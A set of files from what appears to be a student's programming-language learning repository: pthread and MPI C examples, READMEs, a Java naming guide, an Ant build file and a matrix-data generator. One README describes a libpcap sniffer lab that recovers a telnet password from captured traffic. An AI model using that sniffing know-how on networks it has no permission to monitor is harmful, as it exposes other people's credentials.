ARGU_TYPE argu;\n\n for (argu.row = 0; argu.row < A_row; argu.row++) {\n for (argu.column = 0; argu.column < B_column; argu.column++) {\n // produce every thread\n pthread_t thread;\n pthread_attr_t attr;\n pthread_attr_init(&attr);\n assert(0 == pthread_create(&thread, &attr, calcute, &argu));\n pthread_join(thread, &return_value);\n ans[argu.row][argu.column] = argu.ans;\n }\n }\n\n#ifdef ANS_TEST\n // print ans in csv format\n printf(\"%d,%d\\n\", A_row, B_column);\n for (argu.row = 0; argu.row < A_row; argu.row++) {\n for (argu.column = 0; argu.column < B_column; argu.column++) {\n printf(\"%d\", ans[argu.row][argu.column]);\n if (argu.column < B_column - 1) printf(\",\");\n }\n printf(\"\\n\");\n }\n#endif\n\n return 0;\n}\n\nvoid *calcute(void *argu) {\n // just calcute each value\n ARGU_TYPE *data_p = (ARGU_TYPE *)argu;\n data_p->ans = 0;\n for (int i = 0; i < A_B; i++) {\n data_p->ans += A[data_p->row][i] * B[i][data_p->column];\n }\n // test to use return value\n return (void *)1;\n}\n\nvoid read_file() {\n // read file part is a little long for the csv file format\n // you can use define to let it print read result to check it\n char *line, *buffer = malloc(sizeof(char) * BUFFER_SIZE);\n if (buffer == NULL) {\n perror(\"malloc faile\\n\");\n exit(-1);\n }\n\n FILE *data = fopen(DATA_FILE_NAME, \"r\");\n if (data == NULL) {\n perror(\"File open failed\\n\");\n exit(-1);\n }\n\n // read A_row, A_B, B_column\n if ((line = fgets(buffer, BUFFER_SIZE, data)) != NULL) {\n char *pch = strtok(buffer, KEY_STR);\n A_row = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n A_B = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n B_column = atoi(pch);\n#ifdef READ_TEST\n printf(\"%d,%d,%d\\n\", A_row, A_B, B_column);\n#endif\n }\n\n // read matrix A\n for (int i = 0;\n ((i < A_row) && (line = fgets(buffer, BUFFER_SIZE, data)) != NULL);\n i++) {\n char *pch = strtok(buffer, KEY_STR);\n for (int j = 0; pch != NULL; j++) {\n A[i][j] = atoi(pch);\n#ifdef READ_TEST\n printf(\"%d\", A[i][j]);\n if (j < A_B - 1) printf(\",\");\n#endif\n pch = strtok(NULL, KEY_STR);\n }\n#ifdef READ_TEST\n printf(\"\\n\");\n#endif\n }\n // read matrix B\n for (int i = 0;\n ((i < A_B) && (line = fgets(buffer, BUFFER_SIZE, data)) != NULL); i++) {\n char *pch = strtok(buffer, KEY_STR);\n for (int j = 0; pch != NULL; j++) {\n B[i][j] = atoi(pch);\n#ifdef READ_TEST\n printf(\"%d\", B[i][j]);\n if (j < B_column - 1) printf(\",\");\n#endif\n pch = strtok(NULL, KEY_STR);\n }\n#ifdef READ_TEST\n printf(\"\\n\");\n#endif\n }\n free(buffer);\n}" }, { "alpha_fraction": 0.7689393758773804, "alphanum_fraction": 0.8030303120613098, "avg_line_length": 32.125, "blob_id": "ef23caaf967c78e695e93fe39cb27336a4cd4883", "content_id": "a3141c50b742f30d45b252a8e96453c9feac9e84", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 536, "license_type": "permissive", "max_line_length": 166, "num_lines": 8, "path": "/c/projects/MPI/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# 消息传递接口\n`jskyzero` `2017/09/06`\n\n> 消息传递界面/接口(英语:Message Passing Interface,缩写MPI)是一个跨语言的通讯协议,用于编写并行计算机。支持点对点和广播。MPI是一个信息传递应用程序接口,包括协议和和语义说明,他们指明其如何在各种实现中发挥其特性。MPI的目标是高性能,大规模性,和可移植性。MPI在今天仍为高性能计算的主要模型。\n\n## Reference\n\n[MPI 编程实训](http://www.easyhpc.org/lab/detail/5/)" }, { "alpha_fraction": 0.7910447716712952, "alphanum_fraction": 0.8208954930305481, "avg_line_length": 21.66666603088379, "blob_id": "9bfc54dbf07bd07e3ca4ced1c5798f871d675c24", "content_id": "1ae344ccb75dedee4546d5bbd319a2d7c9178459", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "permissive", "max_line_length": 41, "num_lines": 3, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# cocos2dx learning code\n\nThis is some learning code about cocos2dx" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.7440000176429749, "avg_line_length": 20, "blob_id": "b3894510ccee8646c8b767321a16323dbea87d91", "content_id": "b90f706e7972093cd89dd0d27bbd129c93aa109b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "permissive", "max_line_length": 80, "num_lines": 6, "path": "/c/projects/socket/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C-Study\n> socket programing\n\n\n## Reference\n[Sockets Tutorial](http://www.cs.rpi.edu/~moorthy/Courses/os98/Pgms/socket.html)" }, { "alpha_fraction": 0.7259231805801392, "alphanum_fraction": 0.7359833121299744, "avg_line_length": 64.21600341796875, "blob_id": "cc0917304a6a2866e8ce9434f6c6bce6c4fa70fc", "content_id": "fe821f1a0afe8a8c07cec89ff0c4ef94c0113bb1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8152, "license_type": "permissive", "max_line_length": 365, "num_lines": 125, "path": "/java/docs/GoogleStyleNaming.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "## Naming Style\n\n### 1 Rules common to all identifiers[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.1-identifier-names)\n\nIdentifiers use only ASCII letters and digits, and, in a small number of cases noted below, underscores. Thus each valid identifier name is matched by the regular expression `\\w+` .\n\nIn Google Style special prefixes or suffixes, like those seen in the examples `name_`, `mName`, `s_name` and `kName`, are **not** used.\n\n### 2 Rules by identifier type[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2-specific-identifier-names)\n\n#### 2.1 Package names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.1-package-names)\n\nPackage names are all lowercase, with consecutive words simply concatenated together (no underscores). For example, `com.example.deepspace`, not `com.example.deepSpace` or `com.example.deep_space`.\n\n#### 2.2 Class names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.2-class-names)\n\nClass names are written in [UpperCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nClass names are typically nouns or noun phrases. For example, `Character` or `ImmutableList`. Interface names may also be nouns or noun phrases (for example, `List`), but may sometimes be adjectives or adjective phrases instead (for example, `Readable`).\n\nThere are no specific rules or even well-established conventions for naming annotation types.\n\n*Test* classes are named starting with the name of the class they are testing, and ending with `Test`. For example, `HashTest` or `HashIntegrationTest`.\n\n#### 2.3 Method names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.3-method-names)\n\nMethod names are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nMethod names are typically verbs or verb phrases. For example, `sendMessage` or `stop`.\n\nUnderscores may appear in JUnit *test* method names to separate logical components of the name, with *each* component written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case). One typical pattern is `*<methodUnderTest>*_*<state>*`, for example `pop_emptyStack`. There is no One Correct Way to name test methods.\n\n#### 2.4 Constant names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.4-constant-names)\n\nConstant names use `CONSTANT_CASE`: all uppercase letters, with each word separated from the next by a single underscore. But what *is* a constant, exactly?\n\nConstants are static final fields whose contents are deeply immutable and whose methods have no detectable side effects. This includes primitives, Strings, immutable types, and immutable collections of immutable types. If any of the instance's observable state can change, it is not a constant. Merely *intending* to never mutate the object is not enough. Examples:\n\n```\n// Constants\nstatic final int NUMBER = 5;\nstatic final ImmutableList<String> NAMES = ImmutableList.of(\"Ed\", \"Ann\");\nstatic final ImmutableMap<String, Integer> AGES = ImmutableMap.of(\"Ed\", 35, \"Ann\", 32);\nstatic final Joiner COMMA_JOINER = Joiner.on(','); // because Joiner is immutable\nstatic final SomeMutableType[] EMPTY_ARRAY = {};\nenum SomeEnum { ENUM_CONSTANT }\n\n// Not constants\nstatic String nonFinal = \"non-final\";\nfinal String nonStatic = \"non-static\";\nstatic final Set<String> mutableCollection = new HashSet<String>();\nstatic final ImmutableSet<SomeMutableType> mutableElements = ImmutableSet.of(mutable);\nstatic final ImmutableMap<String, SomeMutableType> mutableValues =\n ImmutableMap.of(\"Ed\", mutableInstance, \"Ann\", mutableInstance2);\nstatic final Logger logger = Logger.getLogger(MyClass.getName());\nstatic final String[] nonEmptyArray = {\"these\", \"can\", \"change\"};\n```\n\nThese names are typically nouns or noun phrases.\n\n#### 2.5 Non-constant field names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.5-non-constant-field-names)\n\nNon-constant field names (static or otherwise) are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nThese names are typically nouns or noun phrases. For example, `computedValues` or `index`.\n\n#### 2.6 Parameter names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.6-parameter-names)\n\nParameter names are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nOne-character parameter names in public methods should be avoided.\n\n#### 2.7 Local variable names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.7-local-variable-names)\n\nLocal variable names are written in [lowerCamelCase](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case).\n\nEven when final and immutable, local variables are not considered to be constants, and should not be styled as constants.\n\n#### 2.8 Type variable names[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.2.8-type-variable-names)\n\nEach type variable is named in one of two styles:\n\n- A single capital letter, optionally followed by a single numeral (such as `E`, `T`, `X`, `T2`)\n- A name in the form used for classes (see Section 5.2.2, [Class names](https://google.github.io/styleguide/javaguide.html#s5.2.2-class-names)), followed by the capital letter `T` (examples: `RequestT`, `FooBarT`).\n\n### 3 Camel case: defined[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.3-camel-case)\n\nSometimes there is more than one reasonable way to convert an English phrase into camel case, such as when acronyms or unusual constructs like \"IPv6\" or \"iOS\" are present. To improve predictability, Google Style specifies the following (nearly) deterministic scheme.\n\nBeginning with the prose form of the name:\n\n1. Convert the phrase to plain ASCII and remove any apostrophes. For example, \"Müller's algorithm\" might become \"Muellers algorithm\".\n\n2. Divide this result into words, splitting on spaces and any remaining punctuation (typically hyphens).\n\n - *Recommended:* if any word already has a conventional camel-case appearance in common usage, split this into its constituent parts (e.g., \"AdWords\" becomes \"ad words\"). Note that a word such as \"iOS\" is not really in camel case *per se*; it defies *any* convention, so this recommendation does not apply.\n\n3. Now lowercase\n\n \n\n everything\n\n \n\n (including acronyms), then uppercase only the first character of:\n\n - ... each word, to yield *upper camel case*, or\n - ... each word except the first, to yield *lower camel case*\n\n4. Finally, join all the words into a single identifier.\n\nNote that the casing of the original words is almost entirely disregarded. Examples:\n\n| Prose form | Correct | Incorrect |\n| ----------------------- | ----------------------------------- | ------------------- |\n| \"XML HTTP request\" | `XmlHttpRequest` | `XMLHTTPRequest` |\n| \"new customer ID\" | `newCustomerId` | `newCustomerID` |\n| \"inner stopwatch\" | `innerStopwatch` | `innerStopWatch` |\n| \"supports IPv6 on iOS?\" | `supportsIpv6OnIos` | `supportsIPv6OnIOS` |\n| \"YouTube importer\" | `YouTubeImporter``YoutubeImporter`* | |\n\n*Acceptable, but not recommended.\n\n**Note:** Some words are ambiguously hyphenated in the English language: for example \"nonempty\" and \"non-empty\" are both correct, so the method names `checkNonempty` and `checkNonEmpty` are likewise both correct." }, { "alpha_fraction": 0.719773530960083, "alphanum_fraction": 0.744439959526062, "avg_line_length": 32.863014221191406, "blob_id": "0c98e4c7ec624ca9c9c028a8c47ebb8e28a60bc9", "content_id": "2916e48d33f4f9ebe0b4c57f864fb0f2a2a6c46e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3404, "license_type": "permissive", "max_line_length": 165, "num_lines": 73, "path": "/c/projects/POSIX/Lab2/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# 实验1 进程和进程通信\n> DDL: 2017/05/08 24:00\n\n## Helloworld\n参考教材写出helloworld,大致的流程已经清楚,不过还是踩了点坑,比如如下程序跑的话就会多输出一个'h'字符。\n```C\n#include <stdio.h> // for printf()\n#include <pthread.h> // for pthread_*, thread_*\n#include <assert.h> // for assert()\n\n// \nvoid* pthread_work(void* arguement) {\n // use type cast to get data from arguement\n char* print_str = (char*)arguement;\n // process data\n printf(\"%s\\n\", print_str);\n return NULL;\n}\n\nint main(int argc, char *argv[]) {\n pthread_t thread;\n pthread_attr_t attr;\n char thread_argument[] = \"Hello World!\"; \n pthread_attr_init(&attr);\n\n // Create pthread\n int result_code = pthread_create(&thread, &attr, pthread_work, thread_argument);\n \n printf(\"In Main All threads completed\\n\");\n // block call \n // pthread_join(thread, NULL);\n // printf(\"Exit\\n\");\n \n return 0;\n}\n```\n想想可能是因scope是system的缘故,于是又发现setscope失败最后才发现linux / Mac OS X 仅允许设置PTHREAD SCOPE SYSTEM,那就无解了。只能说这样初始化了线程却不使用是不可取的行为。\n```C\n // Update: linux / Mac OS X 仅允许设置PTHREAD SCOPE SYSTEM。\n assert(pthread_attr_setscope(&attr, PTHREAD_SCOPE_PROCESS) == 0 );\n```\n\n## 用线程生成Fibonacci数列\n> 用pthread线程库,按照第四章习题4.11的要求生成并输出Fibonacci数列\n\n具体代码请参考2.1.fibonacci.c,思路大概就是面向过程,逐步求精,把计算那一提出到线程中完成,另外使python测试了 4byte signed int 能保存的最大,同时也可以运行2.1.cal_size.py来参考结果是否一致。\n\n## 多线程矩阵乘法\n> 给定两个矩阵A和B,其中A是具有M行、K列的矩阵, B为K行、N列的矩阵, A和B的矩阵积为矩阵C, C为M行、N列。矩阵C中第i行、第j列的元素Cij就是矩阵A第i行每个元素和矩阵B第j列每个元素乘积的和。\n\n> 要求:每个Ci j的计算用一个独立的工作线程,因此它将会涉及生成M×N个工作线程。主线程(或称为父线程)将初始化矩阵A和B,并分配足够的内存给矩阵C,它将容纳矩阵A和B的积。这些矩阵将声明为全局数据,以使每个工作线程都能访问矩阵A、B和C。\n\n老师之前说过会给文件读写,也没有发现文件在哪里,无奈之下自己写了生成文件的代码,使用`bash 2.2.test.sh`一键生成、编译、测试、删除。\n\n具体代码请参考2.2.matrix.c\n\n## Reference\n\n[POSIX thread (pthread) libraries](http://www.yolinux.com/TUTORIALS/LinuxTutorialPosixThreads.html)\n\n[man pthread_attr_init](http://man7.org/linux/man-pages/man3/pthread_attr_init.3.html)\n\n[man pthread_attr_setscope](http://man7.org/linux/man-pages/man3/pthread_attr_setscope.3.html)\n\n[man pthread_create](http://man7.org/linux/man-pages/man3/pthread_create.3.html)\n\n[How to return a value from thread in C](http://stackoverflow.com/questions/2251452/how-to-return-a-value-from-thread-in-c)\n\n[Read CSV file to a 2D array on C](http://stackoverflow.com/questions/20013693/read-csv-file-to-a-2d-array-on-c)\n\n[reference-cstdio-fgets](http://www.cplusplus.com/reference/cstdio/fgets/)\n\n[Unix diff - how to ignore line endings when comparing files?](http://stackoverflow.com/questions/40974170/unix-diff-how-to-ignore-line-endings-when-comparing-files)\n\n" }, { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.7031963467597961, "avg_line_length": 19.809524536132812, "blob_id": "69edf1cbdc0d41f5af4a61200a0f2743cd5bfe45", "content_id": "c71dd0af15dc70ae270c81c697ea0f0e0439de59", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 634, "license_type": "permissive", "max_line_length": 59, "num_lines": 21, "path": "/scheme/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Scheme\n`jskyzero` `2017/01/19`\n\n## Overview\n\n+ 最初是学习《计算机程序的构造的解释》的相关代码。\n+ Scheme\n + Scheme是一种函数式编程语言,是Lisp的两种主要方言之一(另一种为Common Lisp)。\n + Scheme遵循极简主义哲学,以一个小型语言核心作为标准,加上各种强力语言工具(语法糖)来扩展语言本身。\n+ ...\n\n## Install & Run\n\n+ Install: I use [Racket](https://racket-lang.org/)\n+ Run: use Racket run those codes\n\n## Reference\n\n+ [Scheme Reports](http://www.scheme-reports.org/)\n+ [The Racket repository](https://github.com/racket/racket)\n+ ...\n\n" }, { "alpha_fraction": 0.5084269642829895, "alphanum_fraction": 0.5252808928489685, "avg_line_length": 18.83333396911621, "blob_id": "bb29e94e400c6a48e585fd97e1d20be81b36cd42", "content_id": "eea2c554d7fe9f55cc0acda572c38bdd1dd7d1d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 356, "license_type": "permissive", "max_line_length": 59, "num_lines": 18, "path": "/c/hardwork/library/stdarg/va_list.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> //for printf()\n#include <stdarg.h> //for va_start(), va_end(), va_arg() \n\nvoid print_many(int argc, ...) {\n int num;\n va_list argv;\n va_start(argv, argc);\n for (int i = 0; i < argc; i++) {\n num = va_arg(argv, int);\n printf(\"%d is %d \\n\", i, num);\n }\n va_end(argv);\n}\n\nint main() {\n print_many(3, 1, 2, 3);\n return 0;\n}" }, { "alpha_fraction": 0.5227892398834229, "alphanum_fraction": 0.5247370600700378, "avg_line_length": 30.317073822021484, "blob_id": "22dd005f6b7d9fb14b4f7b4d4eacc07b16a61c67", "content_id": "6624409eaef9cbbe1d659dc56b293ba5b5c831d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ant Build System", "length_bytes": 2567, "license_type": "permissive", "max_line_length": 83, "num_lines": 82, "path": "/java/projects/gridworld/Part4/RockHound/build.xml", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!--Ok, Now I learn To use xml and ant -->\n<!--project\n name : name\n default : default run target (must)\n basedir : default is local dir-->\n<project name=\"HelloWorld\" default=\"info\">\n <property file=\"build.properties\"/>\n\n <path id=\"classpath\">\n <pathelement location=\"${lib.dir}/gridworld.jar\"/>\n <pathelement location=\"${lib.dir}/junit-4.9.jar\"/>\n </path>\n\n <!--target\n name : name (must)\n depends : use ',' between many depends\n description : like name\n if : if not exits, Not Run\n unless : if not exits, Run-->\n <target name=\"info\">\n <echo>Hello World - Welcome to Apache Ant!</echo>\n </target>\n\n <target name=\"compile\" description=\"compile app\">\n <mkdir dir=\"${classes.dir}\"/>\n <javac \n classpathref=\"classpath\"\n srcdir=\"${src.dir}\" \n destdir=\"${classes.dir}\" \n includeantruntime=\"false\">\n </javac>\n </target>\n\n <target name=\"jar\">\n <mkdir dir=\"${build.dir}\"/>\n <jar \n destfile=\"${build.dir}/${main-class}.jar\" basedir=\"${classes.dir}\">\n <manifest>\n <attribute name=\"Main-Class\" value=\"${main-class}\"/>\n <attribute name=\"Class-Path\" value=\"../lib/gridworld.jar\"/>\n </manifest>\n </jar>\n </target>\n \n <target name=\"run\" description=\"run app\" depends=\"compile, jar\">\n <java jar=\"${build.dir}/${main-class}.jar\" fork=\"true\">\n </java>\n </target>\n\n <target name=\"test-compile\" description=\"compile tests\" depends=\"compile, jar\">\n <mkdir dir=\"${tests.dir}\"/>\n <javac \n srcdir=\"${test.dir}\" \n destdir=\"${tests.dir}\" \n includeantruntime=\"false\">\n <classpath>\n <path refid=\"classpath\"/>\n <pathelement location=\"${classes.dir}\" />\n </classpath>\n </javac>\n </target>\n\n <target name=\"test\" depends=\"test-compile\">\n <junit printsummary=\"on\" haltonfailure=\"yes\" fork=\"true\">\n <classpath>\n <path refid=\"classpath\"/>\n <pathelement location=\"${tests.dir}\" />\n <pathelement location=\"${classes.dir}\"/>\n </classpath>\n <formatter type=\"brief\" usefile=\"false\" />\n <batchtest>\n <fileset dir=\"${test.dir}\" includes=\"*.java\"/>\n </batchtest> \n </junit>\n </target>\n\n <target name=\"clean\">\n <delete dir=\"${build.dir}\"/>\n </target>\n\n</project>" }, { "alpha_fraction": 0.6131479144096375, "alphanum_fraction": 0.6257901191711426, "avg_line_length": 21.628570556640625, "blob_id": "8f4f1dd028bb4206dee9971e99d88519b223c44b", "content_id": "d1b0a7348a9f9b447ad47beac8abf07c4d2af05e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 791, "license_type": "permissive", "max_line_length": 75, "num_lines": 35, "path": "/c/projects/MPI/hardway/MPI_comm_create.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, new_numprocs;\n MPI_Group group_world, odd_group;\n MPI_Comm new_comm;\n int i;\n int members[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n members[i] = 2 * i + 1;\n }\n\n MPI_Group_incl(group_world, numprocs / 2, members, &odd_group);\n\n // int MPI_Comm_create(MPI_Comm comm, MPI_Group group, MPI_Comm *newcomm)\n MPI_Comm_create(MPI_COMM_WORLD, group_world, &new_comm);\n\n if (myid % 2 != 0) {\n MPI_Comm_size(new_comm, &new_numprocs);\n\n printf(\"The new comm's size is %d.\\n\", new_numprocs);\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.7498204708099365, "alphanum_fraction": 0.7639454007148743, "avg_line_length": 50.567901611328125, "blob_id": "aa8dfbb8cf49641dbbf0b09d1a3e9166be6a6a3a", "content_id": "4532c668db6b52976ce2835d512f302a30de780a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4501, "license_type": "permissive", "max_line_length": 648, "num_lines": 81, "path": "/c/projects/sniff/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Sniff\n`jskyzero` `2017/11/26`\n\n## Overview\n\nminisniff is a mini sniff that capture package and show some info about the package.\n\n## Install & Run\n1. Fitst Install Dependence `sudo apt-get install libpcap0.8-dev`\n\n2. Try to Make it `make`\n\n3. Run as `sudo ./minisniff 2` to capture 2 package\n\n## Question & Answer\n\n1. What library does minisniff use to capture packets? Where in the web can you find more information about this library?\n\n\tlibpcap: a portable C/C++ library for network traffic capture.\n\n\tofficial web site: http://www.tcpdump.org/\n\n2. Do some research and describe the advantages/disadvantage of using this library? Do not blindly copy and paste material from the web. Try to understand the material you find and write what you understood.\n\n\tadvantages: 隔离底层细节,提供上层接口方便使用/利用操作系统提供的过滤机制,减少资源开销\n\tdisadvantage: 是 C/C++ 的库,受限于编程语言的局限性。\n\n3. Are there any alternative libraries available to capture packets? (Open source only)\n\n\t+ [pcap4j A Java library for capturing, crafting, and sending packets](https://github.com/kaitoy/pcap4j)\n\t+ [libtins packet crafting and sniffing library](https://github.com/mfontanini/libtins)\n\n4. Explain the purpose of the following functions:\n\t+ pcap_lookupdev: locating the network card(find the default device on which to capture)\n\t+ pcap_open_live: open the network card to sniff(open a device for capturing)\n\t+ pcap_lookupnet: find the IPv4 network number and netmask for a device\n\t+ pcap_compile: compile a filter expression\n\t+ pcap_setfilter: pcap_setfilter - set the filter\n\t+ pcap_next: read the next packet from a pcap_t\n\t+ pcap_loop: read the network card and returns numbers of packets captured\n\t+ pcap_dispatch: process packets from a live capture or savefile\n\n5. There are five layers in the TCP/IP stack (application, transport, network, link, and physical). Up to what layer can minisniff decode data from the captured\npackets? Justify your answer using the code.\n\n\t从运行时候的mac address可以推测是在数据链路层,在manpage中也有说明:`... probably includes a link-layer header...`\n\n\n## telnet\n\n+ I have windows 10 and linux OS, It seems that windows 10 don't have the unsafe telnet server, I use Linux as the server, you can find how to install it on internet.\n\n+ linux server : `sudo /etc/init.d/xinetd start`, then windows client `telnet 192.168.199.100`, you can open wireshark to capture package.\n\n+ use wireshark to analysis which bytes is passworld and should disply\n\n![](docs/1.png)\n\n图上是判断flag字段,处理的方法十分简单粗暴,判断mac地址保留client的包,然后判断flag字段保留Telnet包,然后打印对于字段。\n\n+ then compile and run and output ans.\n\n![](docs/2.png)\n由于捕捉到包以后是逆序输出所以实际上是12 / 123,不可见字符是因为打印太暴力了。\n\n## Original Readme\n\n```\n\t\treadme file for minisniff\n\t\t-------------------------\ni don't think i need to tell you this but i'll tell it anyway, minisniff is written for you to experiment with the source code for network security classes CS393/CS682. DO NOT USE this sniffer outside our security testbed in isis lab.\n\nso, this is a sample code for how to start writing a sniffer. i hope this answers most of your questions about how hard/easy it is to capture packets off the wire and how to write a sniffer etc. you need to download and install pcap (packet capture) library on your machine to compile the sniffer. you can download pcap from http://www.tcpdump.org/ once you install the pcap library all you need to do is type 'make' in the directory where you have this README file, so that the files can be compiled. there shouldn't be errors or warnings, if so email me the errors, copy-paste them, don't even attempt to describe the errors on your own words:-) \n\nif you just want to run the sniffer and see what it does use the compiled 'minisniff' file that comes with this file, then you don't need pcap library, but the file is compiled on Linux (i-386, ELF) so obviously it wont work on other operating systems. you should be able to execute the sniffer by typing './minisniff 20' to capture and display information about 20 packets.\n\nfeel free to modify the code and enhance the sniffer as you please. drop me a line if you need any help, but i don't guarantee that i'd be able to help you.\n```\n\n## Reference\n+ [Programming with pcap](https://www.tcpdump.org/pcap.html)\n" }, { "alpha_fraction": 0.542518138885498, "alphanum_fraction": 0.6005273461341858, "avg_line_length": 21.984848022460938, "blob_id": "a4d9c1fad363a25cd4291795b6113352238ff35d", "content_id": "d45dc77dfcbcb4f9bfd69f2a075877cd3c043ab6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1517, "license_type": "permissive", "max_line_length": 80, "num_lines": 66, "path": "/c/projects/POSIX/Lab2/2.2.produce_data.py", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\"\"\"produce data for matrix\nexample:\n2,3,2\n00,01,02\n10,11,12\n00,01\n10,11\n20,21\n\nmeans:\nA = 2 X 3\nB = 3 X 2\nA = 0, 1, 2\n 10, 11, 12\nB = 0, 1\n 10, 11\n 20, 21\n\"\"\"\n\nimport random\nimport csv\n\n# max value 1000^3 < 1<<31\nMATRIX_MAX_SIZE = 1000\nDATA_FILE_NAME = \"2.2.data.csv\"\nANS_FILE_NAME = \"2.2.ans.csv\"\n\n\ndef prouce_value():\n \"\"\"produce a random value in [1, MATRIX_MAX_SIZE]\"\"\"\n return random.randint(1, MATRIX_MAX_SIZE)\n\n\ndef produce_matrix(row, column):\n \"\"\"prodece a random num matrix\"\"\"\n return [[prouce_value() for _ in xrange(0, column)] for _ in xrange(0, row)]\n\n\ndef write_data_file(matrix1, matrix2):\n \"\"\"write two matrix to file\"\"\"\n with open(DATA_FILE_NAME, \"wb\") as outfile:\n head_info = [[len(matrix1), len(matrix1[0]), len(matrix2[0])]]\n csv_writer = csv.writer(outfile)\n csv_writer.writerows(head_info + matrix1 + matrix2)\n\n\ndef cal_ans(matrix1, matrix2):\n \"\"\"cal the ans matrix\"\"\"\n return [[sum(a * b for a, b in zip(row_1, row_2))\n for row_2 in zip(*matrix2)] for row_1 in matrix1]\n\n\ndef write_ans_file(ans):\n \"\"\"write One matrix to file\"\"\"\n with open(ANS_FILE_NAME, \"wb\") as outfile:\n head_info = [[len(ans), len(ans[0])]]\n csv_writer = csv.writer(outfile)\n csv_writer.writerows(head_info + ans)\n\n\nif __name__ == \"__main__\":\n SAME = prouce_value()\n A = produce_matrix(prouce_value(), SAME)\n B = produce_matrix(SAME, prouce_value())\n write_data_file(A, B)\n write_ans_file(cal_ans(A, B))\n" }, { "alpha_fraction": 0.7247486710548401, "alphanum_fraction": 0.7348013520240784, "avg_line_length": 41.632652282714844, "blob_id": "fc95e3562a1a07128f468d4a0ebc04eb51e52b5c", "content_id": "5bac34ae7bc790aa695204c981fe94f3b00c4545", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2781, "license_type": "permissive", "max_line_length": 204, "num_lines": 49, "path": "/csharp/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C#-Study\n`jskyzero` `2017/12/31`\n## Overview\n+ C#是微软推出的一种基于.NET框架的、面向对象的高级编程语言。\n+ 语言本身深受Visual Basic、Java、C和C++ 的影响。\n+ C#旨在设计成为一种“简单、现代、通用”,以及面向对象的程序设计语言\n+ C# 是 .NET 框架的一部分,且用于编写 .NET 应用程序。因而我们可能需要先了解下 .NET\n\n![.NET 体系结构组件](https://docs.microsoft.com/zh-cn/dotnet/standard/media/components.png)\n\n[.NET框架](https://docs.microsoft.com/zh-cn/dotnet/standard/components)以通用语言运行库为基础,支持多种语言。.NET框架包括称为公共语言运行时(CLR)的虚拟执行系统和统一的类库,CLR是微软对通用语言架构(CLI,Common Language Infrastructure)的实现。通用语言架构定义了一个语言无关的跨体系结构的运行环境。\n\n1. C#源代码被编译成符合CLI规范的中间语言(IL),IL代码与资源文件一起作为程序集文件存为.{exe|dll}文件。\n2. 